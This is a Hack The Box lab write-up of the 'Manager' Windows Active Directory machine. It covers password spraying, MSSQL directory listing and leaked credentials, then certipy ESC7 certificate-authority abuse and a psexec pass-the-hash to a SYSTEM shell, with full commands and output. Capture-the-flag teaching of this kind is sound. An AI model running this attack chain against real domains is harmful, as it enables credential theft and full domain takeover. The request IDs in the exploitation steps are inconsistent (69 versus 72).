Manager - HTB Writeup
Machine Overview
Manager was a medium-ranked Windows Active Directory (AD) machine on HTB, involving the exploitation of mssql to read the content of the web. In the website-backup.zip file, we obtained the credentials of the raven user, which we used to gain initial access to the machine. For privilege escalation, we exploited a misconfigured certificate.
User
Scanning through Nmap
First, we’ll use Nmap to scan the whole network and find out what services are running. With the -p- option, we can check all 65535 ports, and by adding –min-rate 10000, we can make the scan faster. After running Nmap, we’ll have a list of open ports on the network, and we’ll use tools like cut and tr to filter out only the open ones.
1
2
$ nmap -p- --min-rate 10000 10.10.11.236 -oN ini.txt && cat ini.txt | cut -d ' ' -f1 | tr -d '/tcp' | tr '\n' ','
80
Now let’s run a detailed scan on these specific ports using…
1
$ nmap -p80 -sC -sV -A -T4 10.10.11.236 -oN scan.txt
- -sC is to run all the default scripts
- -sV for service and version detection
- -A to check all default things
- -T4 for aggressive scan
- -oN to write the result into a specified file
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
Nmap scan report for 10.10.11.236
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-22 13:43:39Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-10-22T13:46:45+00:00; +6h59m57s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-10-22T13:46:46+00:00; +6h59m56s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-10-22T13:46:45+00:00; +6h59m57s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-10-22T13:46:46+00:00; +6h59m56s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49681/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49682/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49709/tcp open msrpc Microsoft Windows RPC
49780/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=10/22%Time=6534C4A3%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version
SF:\x04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m56s, deviation: 0s, median: 6h59m55s
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server
| number: 15.00.2000.00
| Product: Microsoft SQL Server
|_ TCP port: 1433
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-10-22T13:46:06
|_ start_date: N/A
- It is a AD environment
dc01.manager.htbfound domain controller - MS SQL server is running in the on port 1433
- LDAP is running
Recon
Simple content writing non responsive static website, found potential username Johndue on website
Let’s enumerate and check if we have any shares publicly available using smbclient -L 10.10.11.236 and we found 5 shares
1
2
3
4
5
6
7
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Lets run [enum4linux](https://cheatsheet.haax.fr/network/services-enumeration/135_rpc/) 10.10.11.236 and it found we can login using password without providing any username, it also found
- Domain Name : MANAGER
- Domain Sid : S-1-5-21-4078382237-1492182817-2568127209 domain name is manager.htb:dc01$@MANAGER.HTB Everything we tried so far didn’t worked for us Let’s try to find out list of users using tool crackmapexec.
crackmapexec smb manager.htb -u 'Anonymous' -p '' --rid-brute here smb for identiofying we are going to use smb -u for user -p for password and –rind-brute is to brute everything like users, grougs etc everything And boom we got some user names on machine
- Zhong
- Cheng
- Raven
- JinWoo
- ChinHae
- Operator
Now we have some Valid username on the DC Lets try to perform password spray against it. first lets create a text file in which we will save all these names and we will check every name as a password against every username for password spraying we will use again our loving crackmapexec. crackmapexec smb manager.htb -u user.txt -p user.txt --continue-on-success. here –continue-on-success is to keep checking if it find any valid credientials. we found one valid account with password. - operator:operator
Lets check if it have access to some smb shares using again our loving smbclient using smbclient -L \\\\10.10.11.236\\ -U operator%operator. But we didn’t found any useful shares all these shares are default shares
I used it in different places but all in vain. At last i think about to password spray at mssql service which we found through nmap scan. i used crackmapexec mssql manager.htb -u user.txt -p user.txt -d dc01.manager.htb here -d is denoting our domain controller. and found again operator:operator as a user on mssql service account
Lets use this to login into mssql. for this we will use tool called mssqlclient.py (mssqlclient.py is a Python script belonging to the Impacket library, designed for communication with Microsoft SQL Server databases. Acting as a command-line interface, it facilitates tasks like querying databases, executing SQL commands, and extracting information using the TDS protocol. Typically employed by security professionals and penetration testers, Impacket tools help assess network and system security. However, it’s crucial to emphasize responsible and authorized usage to avoid any legal or ethical complications. Always ensure proper permissions before engaging in security testing activities with such tools.)mssqlcient.py manager.htb/operator:operator@manager.htb -dc-ip manager.htb -windows-auth here -dc-ip is for domain IP and -windows-auth is to use Windows Authentication because we are working on windows environment. And you know what we got a session with mssql.
Lets Enumerate a it and check it’s tables. but we found nothing interesting in it. We see on port 80 webserver is running and the default location of web files in AD environment is C:\inetpub\wwwroot. If somehow we can check this directory , we can get juicy information and can check server side code. In hacktricks article on testing MSSQL, I found that xp_dirtree can be used to list out directory content through MSSQL. (xp_dirtree is an extended and undocumented stored procedure can be used to list all folders and subfolders (recursively) from a given directory. XP_DIRTREE has three parameters: Directory — This is the directory you pass when you call the stored procedure; for example, 'D:\Backup_Files'). To use xp_dirtree in MSSQL we have to use it with EXEC command which is used to run stored procedure in MSSQL. so the syntax will be EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1; here 1, 1; is for depth to check by default it will not check file recursively and only check for directories.
We found one website-backup file in web root directory. Lets download it and check the files inside it. we found on old-config.xml file inside it which looks interesting.
We found raven user password inside it.
- raven@manager.htb:R4v3nBe5tD3veloP3r!123
Initial Access
Let’s use these creds to check if we are allowed to use evil-winrm to login to raven account through these credentials.
Now Let’s login to raven account using Evil-winrm.
We got our user flag from Desktop.
Privilege Escalation
Let’s move towards privilege escalation and check if we have any vulnerable certificate on machine using Certify.exe. We found one SubCA with managing Certificate permissions.
Let’s go to certipy and check if somehow we can abuse it. We found ESC7 matching our requirements, 1. managing Certificate Authority: which we have. 2. SubCA enabled: which is also enabled. 3. Manage Certificate: which we don’t have but if we have manage CA right then we can give our user this rights.
Exploitation
Let’s move to Exploitation phase. You have to do these steps fast otherwise it will give you access denied when you request for certificate on fourth step. First we need to add our user raven to manage Certificate user using by adding him as a new officer:
1
2
3
4
5
6
7
8
9
10
11
➜ manager $ certipy ca -ca 'manager-DC01-CA' -add-officer raven -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'MANAGER.HTB' at '192.168.190.2'
[+] Resolved 'MANAGER.HTB' from cache: 10.10.11.236
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.236:636 - ssl
[+] Default path: DC=manager,DC=htb
[+] Configuration path: CN=Configuration,DC=manager,DC=htb
[+] Trying to get DCOM connection for: 10.10.11.236
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
Now our user is added, Let’s add SubCA template to CA by using -enable-template parameter.
1
2
3
4
➜ manager $ certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
Now we need to request for Certificate based on SubCA template. This request will be denied, but we will save the private key and note down the request ID.
1
2
3
4
5
6
7
8
9
➜ manager $ certipy req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -target manager.htb -template SubCA -upn administrator@manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 69
Would you like to save the private key? (y/N) y
[*] Saved private key to 69.key
[-] Failed to request certificate
Now the Key is stored in 69.key file. With our Manage CA and Manage Certificates, we can then issue the failed certificate request with the ca command and the -issue-request <request ID> parameter.
1
2
3
4
➜ manager $ certipy ca -ca 'manager-DC01-CA' -issue-request 72 -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
And finally, we can retrieve the issued certificate with the req command and the -retrieve <request ID> parameter.
1
2
3
4
5
6
7
8
9
➜ manager $ certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -target manager.htb -retrieve 72
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 72
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '72.key'
[*] Saved certificate and private key to 'administrator.pfx'
Lets perform authentication to get the TGT and the hash of Administrative account which we will use further to perform pass-the-hash attack to log into the machine as Administrator
1
2
3
4
5
6
7
8
9
➜ manager $ certipy auth -pfx administrator.pfx -dc-ip 10.10.11.236 -username Administrator -domain manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
Now Let’s perform Pass-the-hash attack to log into the Administrative account
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
➜ manager $ psexec.py manager.htb/Administrator@10.10.11.236 -hashes 'aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef'
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.11.236.....
[*] Found writable share ADMIN$
[*] Uploading file oysZOmVp.exe
[*] Opening SVCManager on 10.10.11.236.....
[*] Creating service oNbr on 10.10.11.236.....
[*] Starting service oNbr.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4974]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
Now Grab our root password present at C:\Users\Administratot\Desktop\root.txt
Flags
User.txt : 80d667……6374b….3b508390b263a
Root.txt : 7de01…….228417ff893f……31bd430